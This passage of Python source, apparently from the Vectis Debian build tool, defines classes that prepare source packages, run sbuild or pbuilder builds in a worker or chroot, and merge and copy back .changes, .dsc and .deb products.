is not None:\n self.binary_packages.append(binary)\n\n elif self.buildable.endswith('.changes'):\n self.dirname = os.path.dirname(self.buildable) or os.curdir\n self.sourceful_changes_name = self.buildable\n sourceful_changes = Changes(open(self.buildable))\n if 'source' not in sourceful_changes['architecture'].split():\n raise ArgumentError(\n 'Changes file {!r} must be sourceful'.format(\n self.buildable))\n\n self.nominal_suite = sourceful_changes['distribution']\n\n for f in sourceful_changes['files']:\n if f['name'].endswith('.dsc'):\n if self.dsc_name is not None:\n raise ArgumentError(\n 'Changes file {!r} contained more than one '\n '.dsc file'.format(self.buildable))\n\n self.dsc_name = os.path.join(self.dirname, f['name'])\n\n if self.dsc_name is None:\n raise ArgumentError(\n 'Changes file {!r} did not contain a .dsc file'.format(\n self.buildable))\n\n self.dsc = Dsc(open(self.dsc_name))\n\n elif self.buildable.endswith('.dsc'):\n self.dirname = os.path.dirname(self.buildable) or os.curdir\n self.dsc_name = self.buildable\n self.dsc = Dsc(open(self.dsc_name))\n\n else:\n raise ArgumentError(\n 'buildable must be .changes, .dsc or directory, not '\n '{!r}'.format(self.buildable))\n else:\n self.source_from_archive = True\n version = None # type: Optional[str]\n\n if '_' in self.buildable:\n source, version = self.buildable.split('_', 1)\n 
else:\n source = self.buildable\n\n self.source_package = source\n if version is not None:\n self._source_version = Version(version)\n\n if self.dsc is not None:\n self.source_package = self.dsc['source']\n self._source_version = Version(self.dsc['version'])\n self.arch_wildcards = set(self.dsc['architecture'].split())\n self.binary_packages = [p.strip()\n for p in self.dsc['binary'].split(',')]\n\n if self._source_version is not None:\n self._binary_version = Version(\n str(self._source_version) + self.binary_version_suffix)\n\n assert self.source_package is not None\n\n timestamp = time.strftime('%Y%m%dt%H%M%S', time.gmtime())\n\n if self.output_dir is None:\n if self._binary_version is None:\n dirname = '{}_{}'.format(self.source_package, timestamp)\n else:\n dirname = '{}_{}_{}'.format(\n self.source_package,\n self._binary_version,\n timestamp)\n\n self.output_dir = os.path.join(output_parent, dirname)\n\n # For convenience, create a symbolic link for the latest build of\n # each source package: hello_latest -> hello_2.10-1_20170319t102623\n\n unversioned_symlink = os.path.join(\n output_parent, self.source_package + '_latest')\n\n with suppress(FileNotFoundError):\n os.unlink(unversioned_symlink)\n\n os.symlink(dirname, unversioned_symlink)\n\n # If we know the version, also create a symbolic link for the\n # latest build of each source/version pair:\n # hello_2.10-1 -> hello_2.10-1_20170319t102623\n if self._binary_version is not None:\n versioned_symlink = os.path.join(\n output_parent,\n '{}_{}'.format(self.source_package, self._binary_version))\n\n with suppress(FileNotFoundError):\n os.unlink(versioned_symlink)\n\n os.symlink(dirname, versioned_symlink)\n\n # It's OK if the output directory exists but is empty.\n with suppress(FileNotFoundError):\n os.rmdir(self.output_dir)\n\n # Otherwise, if someone already created this, we'll just crash out.\n os.mkdir(self.output_dir)\n\n if self.dsc is not None:\n assert self.dsc_name is not None\n\n abs_file = os.path.abspath(self.dsc_name)\n abs_dir, base = os.path.split(abs_file)\n os.symlink(abs_file, os.path.join(self.output_dir, base))\n\n for l in self.link_builds:\n symlink = os.path.join(l, base)\n\n with suppress(FileNotFoundError):\n os.unlink(symlink)\n\n os.symlink(abs_file, symlink)\n\n for f in self.dsc['files']:\n abs_file = os.path.join(abs_dir, f['name'])\n os.symlink(\n abs_file,\n os.path.join(self.output_dir, f['name']))\n\n for l in self.link_builds:\n symlink = os.path.join(l, f['name'])\n\n with suppress(FileNotFoundError):\n os.unlink(symlink)\n\n os.symlink(abs_file, symlink)\n\n @property\n def product_prefix(self):\n if self._product_prefix is None:\n version_no_epoch = Version(self.binary_version)\n version_no_epoch.epoch = None\n self._product_prefix = '{}_{}'.format(\n self.source_package, version_no_epoch)\n\n return self._product_prefix\n\n @property\n def binary_version(self):\n return self._binary_version\n\n @property\n def source_version(self):\n return self._source_version\n\n @source_version.setter\n def source_version(self, v):\n self._source_version = v\n self._product_prefix = None\n self._binary_version = Version(\n str(self._source_version) + self.binary_version_suffix)\n\n def copy_source_to(self, worker):\n worker.check_call([\n 'mkdir', '-p', '-m755', '{}/in'.format(worker.scratch)])\n\n if self.dsc_name is not None:\n assert self.dsc is not None\n\n worker.copy_to_guest(\n self.dsc_name,\n '{}/in/{}'.format(\n worker.scratch,\n os.path.basename(self.dsc_name)))\n\n for f in 
self.dsc['files']:\n worker.copy_to_guest(\n os.path.join(self.dirname, f['name']),\n '{}/in/{}'.format(worker.scratch, f['name']))\n elif not self.source_from_archive:\n worker.copy_to_guest(\n os.path.join(self.buildable, ''),\n '{}/in/{}_source/'.format(\n worker.scratch,\n self.product_prefix))\n worker.check_call([\n 'chown', '-R', 'sbuild:sbuild',\n '{}/in/'.format(worker.scratch)])\n if self._source_version.debian_revision is not None:\n worker.check_call([\n 'install', '-d', '-m755', '-osbuild', '-gsbuild',\n '{}/out'.format(worker.scratch)])\n\n origs_copied = set()\n\n for orig_dir in self.orig_dirs:\n orig_glob_prefix = glob.escape(\n os.path.join(\n self.buildable, orig_dir,\n '{}_{}'.format(\n self.source_package,\n self._source_version.upstream_version)))\n\n for orig_pattern in (\n orig_glob_prefix + '.orig.tar.*',\n orig_glob_prefix + '.orig-*.tar.*'):\n logger.info(\n 'Looking for original tarballs: %s', orig_pattern)\n\n for orig in glob.glob(orig_pattern):\n base = os.path.basename(orig)\n\n if base in origs_copied:\n logger.info(\n 'Already copied %s; ignoring %s', base,\n orig)\n continue\n\n origs_copied.add(base)\n logger.info('Copying original tarball: %s', orig)\n worker.copy_to_guest(\n orig, '{}/in/{}'.format(\n worker.scratch, base))\n worker.check_call([\n 'ln', '-s',\n '{}/in/{}'.format(worker.scratch, base),\n '{}/out/{}'.format(worker.scratch, base),\n ])\n\n def get_source_from_archive(\n self,\n worker, # type: VirtWorker\n chroot, # type: SchrootWorker\n ):\n # We fetch the source ourselves rather than letting sbuild do\n # it, because for source rebuilds we need the orig.tar.* even\n # if it's revision 2 or later, so that we can run lintian on\n # the host system. If we let sbuild run lintian then it would\n # be an outdated version.\n worker.check_call([\n 'mkdir', '/var/lib/sbuild/build/{}'.format(self),\n ])\n worker.check_call([\n 'mkdir', '-p', '-m755', '{}/in'.format(worker.scratch)])\n\n if self.source_version is None:\n chroot.check_call([\n 'sh',\n '-euc',\n 'cd /build/\"$1\"; shift; exec \"$@\"',\n 'sh', # argv[0]\n str(self),\n 'apt-get', '-o=APT::Get::Only-Source=true',\n 'source', self.source_package,\n ])\n else:\n chroot.check_call([\n 'sh',\n '-euc',\n 'cd /build/\"$1\"; shift; exec \"$@\"',\n 'sh', # argv[0]\n str(self),\n 'apt-get', '-o=APT::Get::Only-Source=true',\n 'source',\n '{}={}'.format(\n self.source_package,\n self.source_version,\n )\n ])\n\n dscs = worker.check_output([\n 'sh',\n '-euc',\n 'exec ls /var/lib/sbuild/build/\"$1\"/*.dsc',\n 'sh', # argv[0]\n str(self),\n ], universal_newlines=True)\n\n dscs = dscs.splitlines()\n\n if len(dscs) != 1:\n raise CannotHappen(\n 'apt-get source produced more than one '\n '.dsc file from {!r}'.format(self))\n\n product = dscs[0]\n\n with TemporaryDirectory(prefix='vectis-sbuild-') as tmp:\n copied_back = os.path.join(\n tmp, '{}.dsc'.format(self.buildable))\n worker.copy_to_host(product, copied_back)\n\n self.dsc = Dsc(open(copied_back))\n\n self.source_package = self.dsc['source']\n self.source_version = Version(\n self.dsc['version'])\n self.arch_wildcards = set(\n self.dsc['architecture'].split())\n self.binary_packages = [\n p.strip() for p in self.dsc['binary'].split(',')]\n\n worker.check_call([\n 'sh',\n '-euc',\n 'cd /var/lib/sbuild/build/\"$1\"/; shift; exec mv -- \"$@\"',\n 'sh',\n str(self),\n ] + [f['name'] for f in self.dsc['files']] + [\n worker.scratch + '/in/',\n ])\n\n def select_archs(\n self,\n *,\n worker_arch,\n archs,\n indep,\n indep_together,\n build_source,\n 
source_only,\n source_together):\n builds_i386 = False\n builds_natively = False\n need_source = (\n build_source or (\n build_source is None and\n self.dsc_name is None and\n not self.source_from_archive)\n )\n\n if source_only:\n if need_source:\n self.archs = ['source']\n else:\n logger.warning('Nothing to do')\n self.archs = []\n\n return\n\n for wildcard in self.arch_wildcards:\n if subprocess.call(\n ['dpkg-architecture', '-a' + worker_arch, '--is', wildcard]\n ) == 0:\n logger.info('Package builds natively on %s', worker_arch)\n builds_natively = True\n\n if subprocess.call(\n ['dpkg-architecture', '-ai386', '--is', wildcard]\n ) == 0:\n logger.info('Package builds on i386')\n builds_i386 = True\n\n if archs or indep:\n # the user is always right\n logger.info('Using architectures from command-line')\n self.archs = archs[:]\n else:\n logger.info('Choosing architectures to build')\n indep = ('all' in self.arch_wildcards)\n self.archs = []\n\n if builds_natively:\n self.archs.append(worker_arch)\n\n for line in subprocess.check_output(\n [\n 'sh', '-c', '\"$@\" || :',\n 'sh', # argv[0]\n 'dpkg-query', '-W',\n r'--showformat=${binary:Package}\\n',\n ] + list(self.binary_packages),\n universal_newlines=True).splitlines():\n if ':' in line:\n arch = line.split(':')[-1]\n if arch not in self.archs:\n logger.info(\n 'Building on %s because %s is installed',\n arch, line)\n self.archs.append(arch)\n\n if (worker_arch == 'amd64' and builds_i386 and\n not builds_natively and 'i386' not in self.archs):\n self.archs.append('i386')\n\n if 'all' not in self.arch_wildcards:\n indep = False\n\n if indep:\n if indep_together and self.archs:\n if worker_arch in self.archs:\n self.indep_together_with = worker_arch\n else:\n self.indep_together_with = self.archs[0]\n else:\n self.archs.append('all')\n\n if need_source:\n if source_together and self.archs:\n self.source_together_with = self.archs[0]\n else:\n self.archs[:0] = ['source']\n\n logger.info('Selected architectures: %r', self.archs)\n\n if need_source and self.source_together_with is not None:\n logger.info(\n 'Clean source package will be built alongside %s',\n self.source_together_with)\n\n if indep and self.indep_together_with is not None:\n logger.info(\n 'Architecture-independent packages will be built alongside %s',\n self.indep_together_with)\n\n def select_suite(self, factory, override):\n suite_name = override\n\n if suite_name is None:\n suite_name = self.nominal_suite\n\n if suite_name is None:\n raise ArgumentError(\n 'Must specify --suite when building from {!r}'.format(\n self.buildable))\n\n if isinstance(suite_name, Suite):\n self.suite = suite_name\n else:\n if suite_name == 'UNRELEASED':\n logger.info(\n 'Replacing UNRELEASED with %s', self.vendor.default_suite)\n suite_name = self.vendor.default_suite\n\n if suite_name.endswith('-UNRELEASED'):\n suite_name = suite_name[:-len('-UNRELEASED')]\n logger.info(\n 'Replacing %s-UNRELEASED with %s', suite_name, suite_name)\n\n self.suite = factory.get_suite(self.vendor, suite_name)\n\n if self.nominal_suite is None:\n self.nominal_suite = str(self.suite)\n\n def __str__(self):\n return self.buildable\n\n def get_debs(self, architecture):\n ret = set()\n\n for k, v in self.merged_changes.items():\n changes = Changes(open(v))\n\n for f in changes['files']:\n if (f['name'].endswith('_{}.deb'.format(architecture)) or\n f['name'].endswith('_all.deb')):\n assert '/' not in f['name']\n ret.add(\n os.path.join(\n os.path.dirname(v) or os.curdir,\n f['name'],\n ),\n )\n\n return 
sorted(ret)\n\n def check_build_product(self, base):\n \"\"\"\n Check whether base is a safe filename to copy back to the host.\n If we don't trust the build system, we don't want to create symbolic\n links with arbitrary names under its control.\n \"\"\"\n\n if os.path.basename(base) != base:\n raise ArgumentError('Contains a path separator')\n\n if base.startswith('.'):\n raise ArgumentError('Is a hidden file')\n\n if base.endswith(('.deb', '.udeb')):\n return\n\n if not base.startswith(self.source_package + '_'):\n raise ArgumentError('Unexpected prefix')\n\n if base.endswith(('.changes', '.dsc', '.buildinfo', '.diff.gz')):\n return\n\n if base.startswith(self.source_package + '_') and '.tar.' in base:\n return\n\n raise ArgumentError('Unexpected filename')\n\n def merge_changes(self):\n if self.sourceful_changes_name:\n base = '{}_source.changes'.format(self.product_prefix)\n c = os.path.join(self.output_dir, base)\n c = os.path.abspath(c)\n if 'source' not in self.changes_produced:\n with AtomicWriter(c) as writer:\n subprocess.check_call([\n 'mergechanges',\n '--source',\n self.sourceful_changes_name,\n self.sourceful_changes_name,\n ], stdout=writer)\n\n self.merged_changes['source'] = c\n\n if ('all' in self.changes_produced and\n 'source' in self.merged_changes):\n base = '{}_source+all.changes'.format(self.product_prefix)\n c = os.path.join(self.output_dir, base)\n c = os.path.abspath(c)\n self.merged_changes['source+all'] = c\n with AtomicWriter(c) as writer:\n subprocess.check_call([\n 'mergechanges',\n self.changes_produced['all'],\n self.merged_changes['source'],\n ], stdout=writer)\n\n binary_group = 'binary'\n\n binary_changes = []\n for k, v in self.changes_produced.items():\n if k != 'source':\n binary_changes.append(v)\n\n if v == self.sourceful_changes_name:\n binary_group = 'source+binary'\n\n base = '{}_{}.changes'.format(\n self.product_prefix, binary_group)\n c = os.path.join(self.output_dir, base)\n c = os.path.abspath(c)\n\n if len(binary_changes) > 1:\n with AtomicWriter(c) as writer:\n subprocess.check_call(\n ['mergechanges'] + binary_changes, stdout=writer)\n self.merged_changes[binary_group] = c\n elif len(binary_changes) == 1:\n shutil.copy(binary_changes[0], c)\n self.merged_changes[binary_group] = c\n # else it was source-only: no binary changes\n\n if ('source' in self.merged_changes and\n 'binary' in self.merged_changes):\n base = '{}_source+binary.changes'.format(self.product_prefix)\n c = os.path.join(self.output_dir, base)\n c = os.path.abspath(c)\n self.merged_changes['source+binary'] = c\n\n with AtomicWriter(c) as writer:\n subprocess.check_call([\n 'mergechanges',\n self.merged_changes['source'],\n self.merged_changes['binary'],\n ], stdout=writer)\n\n for ident, linkable in (\n list(self.merged_changes.items()) +\n list(self.changes_produced.items())):\n base = os.path.basename(linkable)\n\n for l in self.link_builds:\n symlink = os.path.join(l, base)\n\n with suppress(FileNotFoundError):\n os.unlink(symlink)\n\n os.symlink(linkable, symlink)\n\n\nclass Build:\n\n def __init__(\n self,\n buildable,\n arch,\n worker,\n *,\n mirrors,\n profiles,\n storage,\n deb_build_options=(),\n dpkg_buildpackage_options=(),\n dpkg_source_options=(),\n environ=None,\n components=(),\n extra_repositories=()):\n self.arch = arch\n self.buildable = buildable\n self.components = components\n self.dpkg_buildpackage_options = dpkg_buildpackage_options\n self.dpkg_source_options = dpkg_source_options\n self.environ = {}\n self.extra_repositories = extra_repositories\n 
assert not isinstance(profiles, str), profiles\n self.mirrors = mirrors\n self.profiles = set(profiles)\n self.storage = storage\n self.worker = worker\n\n if environ is not None:\n for k, v in environ.items():\n self.environ[k] = v\n\n self.environ['DEB_BUILD_OPTIONS'] = ' '.join(deb_build_options)\n\n def sbuild(self, *, sbuild_options=()):\n self.worker.check_call([\n 'install', '-d', '-m755', '-osbuild', '-gsbuild',\n '{}/out'.format(self.worker.scratch)])\n\n logger.info('Building architecture: %s', self.arch)\n\n if self.arch in ('all', 'source'):\n logger.info('(on %s)', self.worker.dpkg_architecture)\n use_arch = self.worker.dpkg_architecture\n else:\n use_arch = self.arch\n\n with SchrootWorker(\n storage=self.storage,\n architecture=use_arch,\n chroot='{}-{}-sbuild'.format(self.buildable.suite, use_arch),\n components=self.components,\n extra_repositories=self.extra_repositories,\n mirrors=self.mirrors,\n suite=self.buildable.suite,\n worker=self.worker,\n ) as chroot:\n self._sbuild(chroot, sbuild_options)\n\n def _sbuild(self, chroot, sbuild_options=()):\n sbuild_version = self.worker.dpkg_version('sbuild')\n\n argv = [\n self.worker.command_wrapper,\n '--chdir',\n '{}/out'.format(self.worker.scratch),\n '--',\n 'runuser',\n '-u', 'sbuild',\n '--',\n 'env',\n ]\n\n for k, v in sorted(self.environ.items()):\n argv.append('{}={}'.format(k, v))\n\n argv.extend((\n 'sbuild',\n '-c', chroot.chroot,\n '-d', str(self.buildable.nominal_suite),\n '--no-run-lintian',\n ))\n\n if self.profiles:\n argv.append('--profiles={}'.format(','.join(self.profiles)))\n\n for x in self.dpkg_buildpackage_options:\n argv.append('--debbuildopt=' + x)\n\n for child in chroot.suite.hierarchy[:-1]:\n # The schroot already has the apt sources, we just need the\n # resolver\n if child.sbuild_resolver:\n argv.extend(child.sbuild_resolver)\n break\n\n if self.arch == 'all':\n logger.info('Architecture: all')\n argv.append('-A')\n\n # Backwards compatibility goo for Debian jessie buildd backport\n # and for sbuild in Ubuntu xenial\n if sbuild_version < Version('0.69.0'):\n argv.append('--arch-all-only')\n else:\n argv.append('--no-arch-any')\n elif self.arch == self.buildable.indep_together_with:\n logger.info('Architecture: %s + all', self.arch)\n argv.append('-A')\n argv.append('--arch')\n argv.append(self.arch)\n elif self.arch == 'source':\n logger.info('Source-only')\n argv.append('--no-arch-any')\n\n if sbuild_version < Version('0.69.0'):\n # Backwards compatibility for Debian jessie buildd backport,\n # and for sbuild in Ubuntu xenial.\n\n # sbuild < 0.69.0 expects to find foo_1_amd64.changes\n # even for a source-only build (because it doesn't really\n # support source-only builds), so we have to cheat.\n perl = (\n \"'\" +\n '$arch = qx(dpkg\\\\x20--print-architecture);\\n' +\n 'chomp($arch);\\n' +\n 'chdir(shift);\\n' +\n 'foreach(glob(\"../*_source.changes\")) {\\n' +\n ' $orig = $_;\\n' +\n ' s/_source\\\\.changes$/_${arch}.changes/;\\n' +\n ' print(\"Renaming\\\\x20$orig\\\\x20to\\\\x20$_\\\\n\");\\n' +\n ' rename($orig,$_) || die(\"$!\");\\n' +\n '}\\n' +\n \"'\")\n\n argv.append(\n '--finished-build-commands=perl -e {} %p'.format(perl))\n\n else:\n logger.info('Architecture: %s only', self.arch)\n argv.append('--arch')\n argv.append(self.arch)\n\n if self.arch in ('source', self.buildable.source_together_with):\n # Build a clean source package as a side-effect of one\n # build.\n argv.append('--source')\n\n for x in self.dpkg_source_options:\n 
argv.append('--debbuildopt=--source-option={}'.format(x))\n\n if self.buildable.binary_version_suffix:\n argv.append('--append-to-version={}'.format(\n self.buildable.binary_version_suffix))\n\n for x in sbuild_options:\n argv.append(x)\n\n if self.buildable.dsc_name is not None:\n if 'source' in self.buildable.changes_produced:\n # We rebuilt the source already. Use the rebuilt version\n # for all subsequent builds.\n argv.append('{}/out/{}'.format(\n self.worker.scratch,\n os.path.basename(self.buildable.dsc_name)))\n else:\n # We got a .dsc from outside Vectis and are not\n # rebuilding it.\n argv.append('{}/in/{}'.format(\n self.worker.scratch,\n os.path.basename(self.buildable.dsc_name)))\n elif self.buildable.source_from_archive:\n argv.append(self.buildable.buildable)\n else:\n # jessie sbuild doesn't support --no-clean-source so build\n # the temporary source package ourselves.\n ds_argv = [\n self.worker.command_wrapper,\n '--chdir',\n '{}/in/{}_source'.format(\n self.worker.scratch, self.buildable.product_prefix),\n '--',\n 'dpkg-source',\n ]\n\n for x in self.dpkg_source_options:\n ds_argv.append(x)\n\n ds_argv.extend(('-b', '.'))\n self.worker.check_call(ds_argv)\n argv.append('{}/in/{}.dsc'.format(\n self.worker.scratch, self.buildable.product_prefix))\n\n logger.info('Running %r', argv)\n try:\n self.worker.check_call(argv)\n finally:\n # Note that we mix chroot.dpkg_architecture and arch here: an\n # Architecture: all build produces foo_1.2_amd64.build, which we\n # rename.\n # We also check for foo_amd64.build because\n # that's what comes out if we do \"vectis sbuild --suite=sid hello\".\n for prefix in (self.buildable.source_package,\n self.buildable.product_prefix):\n product = '{}/out/{}_{}.build'.format(\n self.worker.scratch, prefix, chroot.dpkg_architecture)\n product = self.worker.check_output(\n ['readlink', '-f', product],\n universal_newlines=True).rstrip('\\n')\n\n if self.worker.call(['test', '-e', product]) == 0:\n logger.info(\n 'Copying %s back to host as %s_%s.build...',\n product, self.buildable.product_prefix, self.arch)\n copied_back = os.path.join(\n self.buildable.output_dir,\n '{}_{}_{}.build'.format(\n self.buildable.product_prefix, self.arch,\n time.strftime('%Y%m%dt%H%M%S', time.gmtime())))\n self.worker.copy_to_host(product, copied_back)\n self.buildable.logs[self.arch] = copied_back\n\n symlink = os.path.join(\n self.buildable.output_dir,\n '{}_{}.build'.format(\n self.buildable.product_prefix, self.arch))\n try:\n os.remove(symlink)\n except FileNotFoundError:\n pass\n\n os.symlink(os.path.abspath(copied_back), symlink)\n break\n else:\n logger.warning('Did not find build log at %s', product)\n logger.warning(\n 'Possible build logs:\\n%s',\n self.worker.check_call([\n 'sh', '-c',\n 'cd \"$1\"; ls -l *.build || :',\n 'sh', # argv[0]\n self.worker.scratch]))\n\n if self.arch == 'source':\n # Make sure the orig.tar.* are in the out directory, because\n # we will be building from the rebuilt source in future\n self.worker.check_call([\n 'sh', '-c',\n 'ln -nsf \"$1\"/in/*.orig.tar.* \"$1\"/out/',\n 'sh', # argv[0]\n self.worker.scratch])\n\n product_arch = None\n\n for candidate in (self.arch, self.worker.dpkg_architecture):\n product = '{}/out/{}_{}.changes'.format(\n self.worker.scratch, self.buildable.product_prefix,\n candidate)\n if self.worker.call(['test', '-e', product]) == 0:\n product_arch = candidate\n break\n else:\n raise CannotHappen(\n 'sbuild produced no .changes file from {!r}'.format(\n self.buildable))\n\n copied_back = 
self.copy_back_product(\n '{}_{}.changes'.format(\n self.buildable.product_prefix,\n product_arch),\n '{}_{}.changes'.format(\n self.buildable.product_prefix,\n self.arch))\n\n if copied_back is not None:\n self.buildable.changes_produced[self.arch] = copied_back\n\n changes_out = Changes(open(copied_back))\n\n if 'source' in changes_out['architecture'].split():\n self.buildable.dsc_name = None\n self.buildable.sourceful_changes_name = copied_back\n\n for f in changes_out['files']:\n if f['name'].endswith('.dsc'):\n # expect to find exactly one .dsc file\n assert self.buildable.dsc_name is None\n self.buildable.dsc_name = os.path.join(\n self.buildable.output_dir, f['name'])\n\n assert self.buildable.dsc_name is not None\n # Save some space\n self.worker.check_call(['rm', '-fr', '{}/in/{}_source/'.format(\n self.worker.scratch,\n self.buildable.product_prefix)])\n\n dsc = None\n\n for f in changes_out['files']:\n copied_back = self.copy_back_product(f['name'])\n\n if copied_back is not None and f['name'].endswith('.dsc'):\n dsc = Dsc(open(copied_back))\n\n if dsc is not None:\n if self.buildable.dsc is None:\n self.buildable.dsc = dsc\n\n for f in dsc['files']:\n # The orig.tar.* might not have come back. Copy that too,\n # if necessary.\n self.copy_back_product(f['name'], skip_if_exists=True)\n\n def pbuilder(self, *, sbuild_options=()):\n self.worker.check_call([\n 'install', '-d', '-m755',\n '{}/out'.format(self.worker.scratch)])\n\n logger.info('Building architecture: %s', self.arch)\n\n if self.arch in ('all', 'source'):\n logger.info('(on %s)', self.worker.dpkg_architecture)\n use_arch = self.worker.dpkg_architecture\n else:\n use_arch = self.arch\n\n with PbuilderWorker(\n storage=self.storage,\n architecture=use_arch,\n components=self.components,\n extra_repositories=self.extra_repositories,\n mirrors=self.mirrors,\n suite=self.buildable.suite,\n worker=self.worker,\n ) as worker:\n self._pbuilder(worker)\n\n def _pbuilder(self, worker):\n argv = [\n self.worker.command_wrapper,\n '--chdir',\n '{}/out'.format(self.worker.scratch),\n '--',\n 'env',\n ]\n\n if self.buildable.binary_version_suffix:\n raise ArgumentError(\n 'pbuilder does not support an arbitrary binary version '\n 'suffix')\n\n for k, v in sorted(self.environ.items()):\n argv.append('{}={}'.format(k, v))\n\n argv.extend((\n 'pbuilder',\n 'build',\n ))\n\n argv.extend(worker.apt_related_argv)\n\n if self.profiles:\n argv.append('--profiles')\n argv.append(','.join(self.profiles))\n\n opts = []\n\n for x in self.dpkg_buildpackage_options:\n opts.append(shlex.quote(x))\n\n argv.append('--debbuildopts')\n argv.append(' '.join(opts))\n\n # This must come after debbuildopts\n if self.arch == 'all':\n logger.info('Architecture: all')\n argv.append('--binary-indep')\n elif self.arch == self.buildable.indep_together_with:\n logger.info('Architecture: %s + all', self.arch)\n argv.append('--architecture')\n argv.append(self.arch)\n else:\n logger.info('Architecture: %s only', self.arch)\n argv.append('--binary-arch')\n argv.append('--architecture')\n argv.append(self.arch)\n\n argv.append('--basetgz')\n argv.append('{}'.format(worker.tarball_in_guest))\n argv.append('--buildresult')\n argv.append('{}/out'.format(self.worker.scratch))\n argv.append('--aptcache')\n argv.append('')\n argv.append('--logfile')\n argv.append('{}/out/{}_{}.build'.format(\n self.worker.scratch,\n self.buildable.product_prefix,\n worker.dpkg_architecture,\n ))\n\n # TODO: --host-arch, --no-auto-cross?\n # TODO: --http-proxy\n\n 
argv.append('{}/in/{}'.format(\n self.worker.scratch,\n os.path.basename(self.buildable.dsc_name)))\n\n logger.info('Running %r', argv)\n try:\n self.worker.check_call(argv)\n finally:\n product = '{}/out/{}_{}.build'.format(\n self.worker.scratch, self.buildable.product_prefix,\n worker.dpkg_architecture)\n product = self.worker.check_output(\n ['readlink', '-f', product],\n universal_newlines=True).rstrip('\\n')\n\n if self.worker.call(['test', '-e', product]) == 0:\n logger.info('Copying %s back to host as %s_%s.build...',\n product, self.buildable.product_prefix, self.arch)\n copied_back = os.path.join(\n self.buildable.output_dir,\n '{}_{}_{}.build'.format(\n self.buildable.product_prefix, self.arch,\n time.strftime('%Y%m%dt%H%M%S', time.gmtime())))\n self.worker.copy_to_host(product, copied_back)\n self.buildable.logs[self.arch] = copied_back\n\n symlink = os.path.join(\n self.buildable.output_dir,\n '{}_{}.build'.format(\n self.buildable.product_prefix, self.arch))\n try:\n os.remove(symlink)\n except FileNotFoundError:\n pass\n\n os.symlink(os.path.abspath(copied_back), symlink)\n\n product_arch = None\n\n for candidate in (self.arch, self.worker.dpkg_architecture):\n product = '{}/out/{}_{}.changes'.format(\n self.worker.scratch, self.buildable.product_prefix,\n candidate)\n if self.worker.call(['test', '-e', product]) == 0:\n product_arch = candidate\n break\n else:\n raise CannotHappen(\n 'pbuilder produced no .changes file from {!r}'.format(\n self.buildable))\n\n copied_back = self.copy_back_product(\n '{}_{}.changes'.format(\n self.buildable.product_prefix,\n product_arch),\n '{}_{}.changes'.format(\n self.buildable.product_prefix,\n self.arch))\n\n if copied_back is not None:\n self.buildable.changes_produced[self.arch] = copied_back\n\n changes_out = Changes(open(copied_back))\n dsc = None\n\n for f in changes_out['files']:\n copied_back = self.copy_back_product(f['name'])\n\n if copied_back is not None and f['name'].endswith('.dsc'):\n dsc = Dsc(open(copied_back))\n\n if dsc is not None:\n if self.buildable.dsc is None:\n self.buildable.dsc = dsc\n\n for f in dsc['files']:\n # The orig.tar.* might not have come back. 
Copy that too,\n # if necessary.\n self.copy_back_product(f['name'], skip_if_exists=True)\n\n def copy_back_product(self, base, to_base=None, *, skip_if_exists=False):\n if to_base is None:\n to_base = base\n\n try:\n self.buildable.check_build_product(base)\n except ArgumentError as e:\n logger.warning('Unexpected build product %r: %s', base, e)\n return None\n else:\n product = '{}/out/{}'.format(self.worker.scratch, base)\n copied_back = os.path.join(self.buildable.output_dir, to_base)\n copied_back = os.path.abspath(copied_back)\n\n if skip_if_exists and os.path.exists(copied_back):\n return copied_back\n\n if to_base != base:\n logger.info(\n 'Additionally copying %s back to host as %s...',\n base, to_base)\n else:\n logger.info('Additionally copying %s back to host...', base)\n\n if not skip_if_exists:\n with suppress(FileNotFoundError):\n os.unlink(copied_back)\n\n self.worker.copy_to_host(product, copied_back)\n\n for l in self.buildable.link_builds:\n symlink = os.path.join(l, to_base)\n\n with suppress(FileNotFoundError):\n os.unlink(symlink)\n\n os.symlink(copied_back, symlink)\n\n return copied_back\n\n\nclass BuildGroup:\n def __init__(\n self,\n *,\n binary_version_suffix='', # type: str\n buildables=(), # type: Iterable[str]\n components=(), # type: Iterable[str]\n deb_build_options=(), # type: Iterable[str]\n dpkg_buildpackage_options=(), # type: Iterable[str]\n dpkg_source_options=(), # type: Iterable[str]\n extra_repositories=(), # type: Iterable[str]\n link_builds, # type: Iterable[str]\n orig_dirs=(), # type: Iterable[str]\n output_dir, # type: Optional[str]\n output_parent, # type: str\n mirrors, # type: vectis.config.Mirrors\n profiles=(), # type: Iterable[str]\n sbuild_options=(), # type: Iterable[str]\n storage, # type: str\n suite=None, # type: Optional[str]\n vendor, # type: vectis.config.Vendor\n ):\n # type: (...) 
-> None\n\n self.components = components\n self.deb_build_options = deb_build_options\n self.dpkg_buildpackage_options = dpkg_buildpackage_options\n self.dpkg_source_options = dpkg_source_options\n self.extra_repositories = extra_repositories\n self.link_builds = link_builds\n self.orig_dirs = orig_dirs\n self.output_dir = output_dir\n self.output_parent = output_parent\n self.mirrors = mirrors\n self.profiles = profiles\n self.sbuild_options = sbuild_options\n self.storage = storage\n self.suite = suite\n self.vendor = vendor\n\n self.buildables = [] # type: List[Buildable]\n\n for a in (buildables or ['.']):\n buildable = Buildable(\n a,\n binary_version_suffix=binary_version_suffix,\n link_builds=link_builds,\n orig_dirs=orig_dirs,\n output_dir=output_dir,\n output_parent=output_parent,\n vendor=vendor)\n self.buildables.append(buildable)\n\n self.workers = [] # type: List[Tuple[List[str], str, VirtWorker]]\n\n def select_suites(self, factory):\n for b in self.buildables:\n b.select_suite(factory, self.suite)\n\n def get_worker(\n self,\n argv, # type: List[str]\n suite, # type: str\n ):\n for triple in self.workers:\n a, s, w = triple\n\n if argv == a and suite == s:\n return w\n else:\n w = VirtWorker(\n argv,\n mirrors=self.mirrors,\n storage=self.storage,\n suite=suite,\n )\n self.workers.append((argv, suite, w))\n return w\n\n def new_build(\n self,\n buildable: Buildable,\n arch: str,\n worker: VirtWorker,\n ):\n return Build(\n buildable,\n arch,\n worker,\n components=self.components,\n deb_build_options=self.deb_build_options,\n dpkg_buildpackage_options=self.dpkg_buildpackage_options,\n dpkg_source_options=self.dpkg_source_options,\n extra_repositories=self.extra_repositories,\n mirrors=self.mirrors,\n profiles=self.profiles,\n storage=self.storage,\n )\n\n def get_source(\n self,\n buildable: Buildable,\n worker: VirtWorker,\n ):\n use_arch = worker.dpkg_architecture\n\n if buildable.source_from_archive:\n with SchrootWorker(\n storage=self.storage,\n architecture=use_arch,\n chroot='{}-{}-sbuild'.format(buildable.suite, use_arch),\n components=self.components,\n extra_repositories=self.extra_repositories,\n mirrors=self.mirrors,\n suite=buildable.suite,\n worker=worker,\n ) as chroot:\n buildable.get_source_from_archive(worker, 